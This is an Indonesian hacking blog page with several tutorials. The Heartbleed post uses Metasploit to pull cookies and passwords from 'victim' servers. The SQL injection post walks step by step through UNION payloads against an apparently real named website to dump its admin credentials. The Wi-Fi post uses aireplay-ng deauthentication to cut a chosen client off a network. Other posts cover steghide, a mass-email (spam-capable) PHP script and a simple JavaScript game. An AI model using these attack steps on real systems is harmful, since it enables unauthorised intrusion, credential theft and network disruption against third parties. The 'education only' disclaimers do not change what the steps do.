Senin, 03 Agustus 2015

POC HeartBleed With MetasploitFrameWork





peretasan sebuah website adalah salah satu kegemaran para hacker ataupun cracker, tujuannya apa?. banyak hal yang melatar belakangi seorang hacker melakukan peretasan. beberapa diantaranya adalah mendapatkan uang, karna sebuah gengsi, kesenangan pribadi dan atau pekerjaan. peretasan di definisikan sebagai cara atau kegiatan yang di lakukan untuk menyusupi suatu tempat (server) dari kesalahan sistem yang terdapat pada website. cara dan konsep dari peretasan website sangat banyak sekali, tergantung exploit atau bug yang ada pada website tersebut, contohnya yang paling umum dan sering di gunakan adalah Sql Injection, XSS, LFI, RFI, Temper Data. Semua cara tersebut sangat banyak terdapat di web dan blog-blog umum. bug tersebut juga masih ada website-website walaupun sudah lama. tapi kali ini saya tidak akan membahas salah satu dari beberapa teknik peretasan tersebut. beberapa waktu lalu, FBI di kagetkan oleh sebuah exploit yang memanfaatkan bug openSSL server namanya adalah HeartBleed, OpenSSL adalah Sebuah Protocol silahkan lihat definisi OpenSSL. banyak server yang menggunakan protocol Openssl terdapat bug ini, termasuk server Gmail.com . wow, bisa di bayangkan server perusahaan sebesar google, bisa di exploit dengan terdapatnya bug tersebut, tak heran serluruh perusahaan terkenal dan instansi kepemerintahan segera melakukan patch terhadap bug tersebut. tapi tidak semua server telah di patch, bug ini masih baru, dan masih banyak sekali server yang vulnerabel terhadap bug ini.

pada kali ini saya akan memberikan langkah-langkah POC (Proof Of Concept ) dari Exploit HeartBleed menggunakan Metasploit Frame Work, segera saja masuk langkah-langkahnya :


1. Cari website yang mau di periksa , apakah terdapat bug openssl nya.
gunakan file python berikut untuk memeriksanya. download filenya HeartBleed2.PY
2. Buka Terminal ctrl+alt+T ,Lihat IP website korban, ketik ping www.target.com , ternyata ketemu ipnya 127.0.0.1 (localhost)
3.  Masuk ke direktory dimana file heartbleed2.py .
Pada contoh berikut, file heartbleed.py saya simpan di direktory ~/Desktop/Hacking

Ketik cd ~/Desktop/Hacking lalu enter

3. ketik python heartbleed2.py 127.0.0.1
NB : - 127.0.0.1 hanya contoh, saya menyembunyikan link dan ip asli korban.
- warna merah adalah alamat website
- warna lime adalah ip website 






4. Dapat di lihat pada gambar di atas, terdapat kalimat ( WARNING: server returned more data than it should - server is vulnerable! )
kalimat tersebut menandakan bahwa server ternyata vulnerable terhadap bug openssl. setelah tau ternyata server vulnerable, slanjutnya kita buka MSFCONSOLE. 


5. ketik search heartbleed ,tunggu sampai library heartbleed kluar, apabila tidak ada. berarti MetasploitFrameWork anda masih belum uptodate. lebih baik di update dulu ketik msfupdate , tunggu hingga update selesai. dan lakukan mulai langkah 4.
apabila sudah terupdate, library heartbleed akan terlihat. seperti pada gambar di bawah ini. 






6. Pilih auxiliary/scanner/ssl/openssl_heartbleed , ketik use auxiliary/scanner/ssl/openssl_heartblee lalu Enter.

7. setelah itu ketik show options  untuk melihat apa saja value yang perlu di rubah.


8. dapat di lihat pada gambar di atas terdapat beberapa opsi, ada beberapa yang harus di ganti. yaitu RHOSTS dan verbose nya.
ketik set RHOSTS 127.0.0.1 
NB : ganti 127.0.0.1 dengan IP sesuai IP target yang anda dapat .
lalu ketik set verbose true 
9. setelah semua di set, sekarang waktunya eksekusi.

ketik run untuk menjalankan exploitnya.


10. apabila berhasil , anda akan di hadapkan pada code2 seperti cookie, user agent, dan user n password kalau kalian beruntung. inti dari exploit heartbleed adalah kalian akan mendapati pesan-pesan sensitif atau pribadi yang ada dalam server, yang bisa kalian gunakan untuk melakukan tindak hacking selanjutnya.

source : sakeracoder
Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry

NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.




Steganography Using Tools Steghide



Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. Sebaliknya, kriptografi menyamarkan arti dari suatu pesan, tapi tidak menyembunyikan bahwa ada suatu pesan. Kata "steganografi" berasal dari bahasa Yunani steganos, yang artinya “tersembunyi atau terselubung”, dan graphein, “menulis”.
Kini, istilah steganografi termasuk penyembunyian data digital dalam berkas-berkas (file) komputer. Contohnya, si pengirim mulai dengan berkas gambar biasa, lalu mengatur warna setiap pixel ke-100 untuk menyesuaikan suatu huruf dalam alphabet (perubahannya begitu halus sehingga tidak ada seorangpun yang menyadarinya jika ia tidak benar-benar memperhatikannya). source : wikipedia

salah satu cara untuk melakukan teknik steganografi adalah dengan menggunakan tools Stegahide , tools ini tidak terinstall secara default, jadi anda harus menginstallnya terlebih dahulu. bisa lewat terminal atau download langsung DISINI.

pada tutorial ini saya menggunakan OS Xubuntu ( Ubuntu versi Xfce ), dan download steghide dari terminal.

1. Buka terminal alt+ctrl+T 
ketik : apt-get install stegahide
ketik : Y saat ada pertanyaan ( Do you want to continue ? )
NB : Y untuk konfirmasi penginstalan stegahide .

  
2. Siapkan file berekstensi *.txt dengan isi terserah anda.



3. siapkan file fotonya juga, pada kali ini saya akan menggunakan foto saya dengan nama file bill.jpg .

4. kembali ke terminal lagi, sekarang pindah ke direktori dimana file gambar dan text tadi di simpan, pada contoh kali ini saya menyimpan file di ~/Desktop/Steghide 

ketik : cd ~/Desktop/Steghide



5. ketik : steghide --help
untuk melihat apa saja opsi yang ada pada tools stegahide




6. Ketik : ls 
untuk melihat isi dari direktori tersebut, pada contoh kali ini bisa di lihat pada gambar di bawah ini bahwa terdapat file bill.jpg dan rahasia.txt

7. sekarang kita akan eksekusi melakukan embeding .
ketik : steghide embed -cf bill.jpg -ef rahasia.txt
ketikkan password untuk melindungi file embeding .
pada contoh di sini, saya memakai password : 123456

NB : ganti text berwarna merah dengan file yang anda namai sendiri.




8. setelah proses selesai, anda tidak akan melihat perubahan yang berarti pada setiap file dalam direktori ataupun tampilan pada terminal. untuk memeriksa berhasil atau tidak. pindah file foto bill.jpg tadi ke direktori lain.

9. Ketik : mkdir hasil 
 NB : mkdir menghasilkan folder baru dengan nama "hasil" .

10.Ketik : mv bill.jpg hasil
NB : mv berfungsi untuk memindah file bill.jpg ke folder hasil



11. Ketik : cd hasil
NB : cd hasil , berfungsi untuk masuk ke folder hasil.



12. ketik : ls
NB : ls untuk melihat isi direktori  

13. Ketik : steghide extract -sf bill.jpg
 NB : perintah di atas, berfungsi untuk mengekstrak atau memisahkan file foto dengan file dokumen.



14. Ketikkan Password : 123456 yang anda masukkan tadi waktu melakukan embeding. lalu enter.

15. Ketik : ls
apabila teknik steganografi ini berhasil, pada folder hasil akan ada dua file yaitu. file bill.jpg dan file rahasia.txt


16. sekarang kita periksa isi dari file rahasia.txt , apakah sama dengan file sebelumnya.
ketik : nano rahasia.txt



Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.





Hacking Website With SQL Injection (Manual)








Relate Search : Melihat isi database dengan teknik manual Sql Injection, Mencuri isi database, Sql Injection, Sqli, Dork Sqli, Cara hacking website dengan sql injection, google dork, dork terbaru.

Sql Injection adalah salah satu teknik hacking suatu website yang memanfaatkan bug Sql pada link dinamis, pada url tersebut attacker dapat memasukkan perintah Sql ke dalam statement Sql via input website. Banyak cara untuk melakukan Sql Injection seperti dengan tools SqlMap, Havij dll, tetapi pada tutorial kali ini saya akan menjelaskan tentang cara Sql Injection secara manual melalui addressbar.

Berikut Langkah-Langkahnya :

1. Siapkan target terlebih dahulu, ( Website yang vulnerable terhadap Sql injection ). Cara mencari nya kita dapat menggunakan Google Dork, untuk melihat google dork terbaru bisa lihat DISINI.
untuk definisi Google Dork dan list Google dork terbaru bisa lihat DISINI.

2. Setelah kita dapat targetnya , sekarang kita akan mulai periksa, apakah website tersebut vulnerable terhadap Sql injection, pada kali ini saya akan mengambil contoh dari website berikut :

http://www.firstgulf.com/search-details.php?id=59




3. Tambahkan Quote pada akhir URL. Contoh :

http://www.firstgulf.com/search-details.php?id=59'



4. Terlihat di atas bahwa terjadi Error Pada Sintax Sql website, hal tersebut menunjukkan website vulnerable terhadap Sql Injection. Setelah itu ganti Quote dengan order by <angka>-- untuk melihat berapa table yang di miliki oleh website.


contoh :
http://www.firstgulf.com/search-details.php?id=59 order by 20--  , kita akan mengetahui jumlah table website apabila dalam permintaan jumlah table tidak terjadi error.

seperti contoh sebelumnya yaitu
http://www.firstgulf.com/search-details.php?id=59 order by 20-- . dalam website target ternyata error, maka lanjutkan ke angka yang lebih bawah.
order by 15-- ( Terjadi Error )
order by 13-- ( Terjadi Error )
order by 11-- ( Tidak Terjadi Error ) #Karna pada angka 11 tidak terjadi Error maka lanjutkan ke angka yang lebih besar selanjutnya yaitu 12.

order by 12-- ( Terjadi Error ) # ternyata pada angka 12 terjadi error, maka bisa di pastikan bahwa website target memiliki jumlah table sebanyak 11.

Contoh Error Order Table :



Hosting Unlimited Indonesia


Contoh Order Table Tanpa Error :





5. Setelah di ketahui bahwa jumlah table ada 11, selanjutnya kita mencari angka akan menunjukkan isi databasenya nanti.tambahkan tanda"-" di awal angka 59, dan deretan angka 1 sampai 11 di akhirnya.

http://www.firstgulf.com/search-details.php?id=-59 union all select
1,2,3,4,5,6,7,8,9,10,11--

6. Dapat di lihat pada gambar di atas, Ketika semua angka di pilih pada perintah Sql = Union All select. pada halaman website target muncul segelintir angka yang posisinya tidak menentu, pada contoh kali ini terlihat angka 2, 3 dan 5. Karna angka 3 yang paling terlihat jelas, jadi kita akan menggunakan angka 3.

7. selanjutnya kita akan melihat versi dari Database Mysql Website target.
ganti angka tiga pada Url sebelumnya, dengan "version()" tanpa tanda kutip.


contoh : http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,version(),4,5,6,7,8,9,10,11--

ternyata setelah di lakukan perintah di atas, angka tiga berganti dengan versi dari database mysql target. dapat terlihat versi nya adalah 5.5.32 .
sebenernya ada versi 4.x.x , tapi pada versi tersebut cara ini tidaka akan berhasil karna untuk database versi 4.x.x , kita akan di hadapkan pada cara Blind Sql.




8.  Selanjutnya kita akan melihat isi daftar table yang ada pada website target .
tambah kan pada url sebelumya.


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


9. Terlihat sudah daftar nama semua table website target. kita cari nama table yang hampir mirip atau memang tempat penyimpanan user dan password login website. pada contoh di sini, terlihat ada table yang bernama "admin", kita akan pilih itu untuk di lihat kolomnya. sebelum eksekusi ke pembedahan table "admin", kita harus merubah kata "admin" kedalam bentuk hexadesima, untuk melakukannya silahkan kunjungi DISINI.


 Ganti beberapa kata dalam url tadi :

http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e--

NB : kata database() di ganti dengan nama table "admin" yang sudah di jadikan hexadesimal, ditambah 0x di depannya jadi = 0x61646d696e .

10. Setelah langkah di atas selesai dan berhasil, kita akan melihat isi dari table "admin" yaitu beberapa kolom. berikut nama-nama kolom pada table "admin".

# id
# admin_name
# admin_login
# admin_password



11.  Setelah di dapati  semua nama kolom, sekarang waktunya untuk melihat isi dari kolom tersebut.

ketik :


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(id, 0x3a,admin_name,0x3a,admin_login,0x3a,admin_password,0x0d0a),4,5,6,7,8,9,10,11 from admin--

NB : 
0x3a adalah bentuk Hexadesimal dari ":" (colon)
0x0d0a adalah bentuk Hexadesimal dari <enter>


12. akhirnya sudah terlihat isi dari kolom "admin" , di situ sudah terpampang
 id:admin_name:admin_login:admin_password

13. Untuk pengembangan selanjutnya anda bisa melakukan login ke halaman admin atau hanya melakukan pentesting terhadap database.
apabila ingin melanjutkan login, silahkan cari halaman login dengan tools, adminfinder.py download DISINI.

berikut ScreenShot nya :




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Membuat Mass Email Broadcaster dengan PHP Script

Assalamualaikum Wr Wb .

Email BroadCaster adalah teknik untuk mengirim pesan secara masal ke segala jenis email, teknik ini di gunakan untuk banyak hal, seperti publikasi acara, undangan, pengumuman, bahkan spaming. contoh teknik broadcast adalah broadcast message milik BlackBerryMesangger. Banyak orang memanfaatkan fitur ini sebagai Mempromosikan Penjualan, Produk. dll.

PHP Script memiliki Fitur untuk mengirim email , Bagaimana caranya?. dalam Bahasa pemrograman PHP, terdapat code mail(to, subject, message) , yang akan kita bahas selanjutnya.
Contoh Email Broadcaster sudah saya buat adalah berikut ini : bill.meximas.com

Screenshot direktori  :


pada contoh sebelumnya, apabila kita klik kirim, halaman otomatis akan di muat ke halaman baru, yaitu ke bill.meximas.com/mail/openfile.php , file openfile.php adalah file yang akan membaca file bill.txt pada direktori /mail/upload/bill.txt. isi dari file bill.txt adalah kumpulan email yang akan kita tuju nanti. apabila ingin mengirim ke email yang lain, kita harus menggantinya pada file tersebut.

Berikut tata cara pembuatan Email BroadCaster dengan PHP Script :

1. Buat akun web hosting dahulu, kalo sudah punya langsung masuk ke file manager atau upload via FTP.
NB : di harapkan web hosting nya sama, agar tidak ada kesulitan yang berarti. pada tutorial kali ini saya menggunakan hosting ini .

2. Sebelum ke langkah upload, silahkan anda download terlebih dahulu file berikut EmailBroadCaster.zip, setelah itu extract file nya. atau copy paste dari link berikut :
- openfile.php
- mail.php
- index.php

3. apabila semua file telah siap, waktunya kita upload file tersebut ke server. pada tutorial ini saya akan menggunakan file manager 1 yang ada pada fitur idhostinger .




4. setelah membuka file manager, silahkan buka folder upload,  Ganti isi file bill.txt dengan list email yang hendak di broadcast.



5. Apabila berhasil, akses web anda, lalu klik kirim. seperti pada gambar berikut :


 6. apabila berhasil sesuai langkah2 di atas. hasil pengiriman broadcast email akan seperti berikut.




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Cut PC Wifi Network with Aircrack-ng


 Assalamualaikum Wr Wb

Aircrack-ng adalah salah satu tools hacking yang sering di pakai untuk penetration test jaringan wifi, dari nama sudah terlihat , yaitu di awali dengan kata Air ( Udara ). Aircrack-ng tidak berdiri sendiri, tools ini di tunjang dengan beberapa tools pendukung yaitu airodump-ng, airmon-ng, aireplay-ng dll.

Airmon-ngadalah tools yang berfungsi untuk mengganti mode pada device network tertentu contoh : wlan0 , eth0 dll.
- wlan0 adalah device network untuk jaringan wireless.
- eth0 adalah device network untuk jaringan cable/wire.

Airodump-ngadalah tools yang berfungsi untuk memantau paket data yang lalu lalang di udara, dalam jarak jangkauan network device kita.

Aireplay-ngadalah tools yang berfungsi untuk melakukan injecting paket data pada jaringan di area kita.

Pada tutorial kali ini kita akan mempraktekkan penggunaan tools Aircrak-ng pada teknik memutuskan koneksi komputer tertentu dengan cara membanjiri jaringan komputer korban dengan request yang ilegal. Operating System yang saya gunakan adalah OS Kali Linux 1.0.6 . bagi yang belom punya silahkan download disini. > versi windows : versi linux

Berikut langkah-langkahnya :

1. Buka terminal, Ketik : airmon-ng start wlan0


 Berikut hasil apabila di tekan Enter :


 Keterangan :
- terlihat pada gambar di atas, pada interface wlan0 , terdapat keterangan  pada kolom driver bahwa ( mode monitor pada interface wlan0 telah hidup )


2. Setelah mode monitoring hidup, waktunya kita melakukan monitoring pada jaringan yang lalu lalang melintasi device kita.

Ketik : airodump-ng mon0


 keterangan :

- format argument yang ada pada tools airodump-ng adalah >airodump-ng [INTERFACE]
- interface kita menggunakan mon0 karna interface tersebut terbentuk dari proses penghidupan mode monitoring tadi.

Berikut hasil apabila di tekan Enter :             





 keterangan :

- tampilan di atas akan tampil apabila kita menjalankan perintah pada airodump-ng.
- target kita ambil dari frames terbanyak, dan sedang tersambung pada AP @wifi.id .

3. Catat mac address AP (Access Point) dan mac address Client , pada contoh kali ini adalah :

- mac  AP : 50:06:04:7A:87:D0
- mac Client : CC:AF:78:33:5E:88        

     

 4. Setelah itu ketik dan paste kan mac address pada argument tools aireplay-ng :
> aireplay-ng -0123456789 -a 50:06:04:7A:87:D0 -c CC:AF:78:33:5E:88 mon0



             

 keterangan :
- format argument yang ada pada tools aireplay-ng adalah >aireplay-ng [OPTION] [INTERFACE]
- argument -0123456789 berfungsi sebagai berikut :

Attack modes (numbers can still be used):

     --deauth      count : deauthenticate 1 or all stations (-0)
     --fakeauth    delay : fake authentication with AP (-1)
     --interactive       : interactive frame selection (-2)
     --arpreplay        : standard ARP-request replay (-3)
     --chopchop       : decrypt/chopchop WEP packet (-4)
     --fragment        : generates valid keystream   (-5)
     --caffe-latte      : query a client for new IVs  (-6)
     --cfrag             : fragments against a client  (-7)
     --migmode      : attacks WPA migration mode  (-8)
     --test                : tests injection and quality (-9)

5. Setelah di tekan enter, program akan berjalan melancarkan serangan kepada komputer atau laptop korban, dengan cara membanjiri jaringan korban dengan request ilegal.  tunggu hingga 1 menit atau secukupnya.      


     


Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Membuat Game Sederhana Dengan JavaScript

Assalamualaikum Wr Wb

Javascript adalah Bahasa pemrograman yang di pakai di web, javascript kebanyakan di gunakan untuk kebutuhan membuat animasi, tapi tidak semata-mata javascript hanya bisa di pakai untuk membuat animasi, untuk kebutuhan operasi web pun sering di gunakan. Javascript bersifat Client Side, maksudnya adalah javascript berjalan di PC pengguna atau pengakses web, dan scriptnya pun bisa di lihat oleh user, berbeda dengan PHP yang scriptnya tidak bisa di lihat oleh user.

Selain di buat animasi, Javascript juga bisa di pakai untuk membuat aplikasi web, salah satunya adalah GAME, pada kesempatan kali ini saya akan memberikan tutorial bagaimana membuat GAME sederhana dengan Javascript, memanfaatkan event-event dalam javascript.

berikut screenshoot dari game sederhana :


Alur Game :

1. Klik button Start.
2. gambar monster akan bergerak cepat.
3. klik sebanyak mungkin gambar monsternya.
4. Apabila skor lebih dari 20, maka anda akan menang.

untuk sourcecode nya bisa di download disini atau copas dari box script di bawah.

Game ini memiliki 3 file, yaitu Html, Js dan Css.

index.html >

<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<title>
</title><script src="js/game.js">
</script></head>
<body><table>
<tr>
<td><span id="waktu">Time Left  </span></td><td>:  <input type="text" id="time" class="text"/></td></tr>
<tr><td><span id="angka">Score      </span></td><td>:  <input type="text" id="score" class="text" />  >= 20</td></tr>
<tr><td><input type="button" onclick="start()" value="start" id="start"/></td><td><select name="level">
<option value="level1">Level 1</option>
<option value="level2">Level 2</option>
<option value="level3">Level 3</option>
<option value="level4">Level 4</option>

</select></td></tr>
</table>
<div id="arena"><img src="img/1.jpg" id="gambar" onclick="nilai()" width="100px" height="100px"/>
</div>
</body>
</html>


game.js >

var angka=20;
var atas=5;
var kiri=10;
var score = 0;
//var waktu = 20;
var waktu_habis = 0;
function start(){
bill = new pindah();
bill2 = new timer();
//.getElementById("score").value = 0;
//document.getElementById("time").value = 0;

}
function nilai(){
document.getElementById("score").value =  score;
//document.getElementById("gambar").style.color = blue;
score++;
}
function timer(){
waktu_habis = document.getElementById("time").value = angka;
angka--;
var hasil = document.getElementById("score").value;
if(waktu_habis==0){
if(hasil<20){
alert("game over!!!");
window.location="index.html";
angka=0; document.getElementById("time").value= angka;
}else{
alert("you win!!");
window.location="index.html";
angka=0; document.getElementById("time").value= angka;
}
}
if(waktu_habis==0){
setTimeout("", 1000);
}else{
setTimeout("timer()", 1000);
}
}
var parameter_kiri = false;
var parameter_atas = false;
function pindah(){
var gambar = document.getElementById("gambar");
gambar.style.position = "fixed";
gambar.style.marginLeft = kiri+"px";
gambar.style.marginTop = atas+"px";
if(kiri==900){
parameter_kiri =true;
}else if(kiri==10){
parameter_kiri=false;
}
if(atas==250){
parameter_atas=true;
}else if(atas==100){
parameter_atas=false;
}
if(parameter_kiri){
kiri-=1;
}else{
kiri+=1;
}
if(parameter_atas){
if(kiri==900){
atas-=20;
}else if(kiri==10){
atas-=20;
}
}else{
if(kiri==900){
atas+=20;
}else if(kiri==10){
atas+=20;
}

}

setTimeout("pindah()", 1/1000);
}


style.css >

#cari { width:200px;height:300px;}
#arena{ width:1000px; height: 300px; background-color:black; padding:20px 20px 20px 20px; border-radius:20px;}
#bilik_kanan{ background-color:white; width:100px; height:100%; float:right; }
#bilik_kiri{ background-color:white; width:100px; height:100%; float:left; } #gambar{ border-radius:50%; }
#start{ width:100px; }
.teks { width:50px; }

Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Search